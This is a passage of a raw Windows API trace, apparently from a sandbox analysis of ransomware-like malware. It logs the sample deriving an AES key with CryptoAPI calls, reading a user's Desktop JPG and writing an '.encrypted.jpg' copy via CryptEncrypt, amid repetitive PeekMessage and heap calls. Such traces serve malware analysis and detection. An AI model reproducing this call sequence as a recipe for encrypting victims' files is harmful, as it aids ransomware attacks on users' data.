lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0030.079] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.079] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.079] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.079] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.079] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.079] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.079] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.079] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.080] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.080] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0030.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.080] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.080] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.080] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.080] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.080] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0030.080] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.080] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.080] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.080] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.080] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.080] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.080] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.080] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.080] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.080] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.080] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0030.080] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.080] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.081] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.081] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0030.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.081] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.081] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.081] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0030.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0030.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.081] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.081] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0030.081] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.081] CryptDestroyHash (hHash=0x7c2240) returned 1 [0030.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.081] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.081] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.081] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0030.081] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nhz507zecnmw5oel.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.082] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.082] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.082] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.082] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.082] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.082] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.encrypted.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nhz507zecnmw5oel.encrypted.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.082] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.082] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0030.082] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.083] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.083] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.083] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x1245, lpOverlapped=0x0) returned 1 [0030.083] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.083] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.083] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.084] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.084] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.084] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.084] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.084] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.084] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.084] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.084] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0030.084] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0030.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.084] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da208, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da208*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.084] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.084] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.085] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0030.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.085] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.085] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.085] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.085] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.085] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.085] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.085] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.085] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.085] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.086] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1245, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x1250) returned 1 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0030.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0030.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0030.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0030.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0030.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0030.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0030.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0030.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0030.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0030.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0030.087] HeapFree (in: 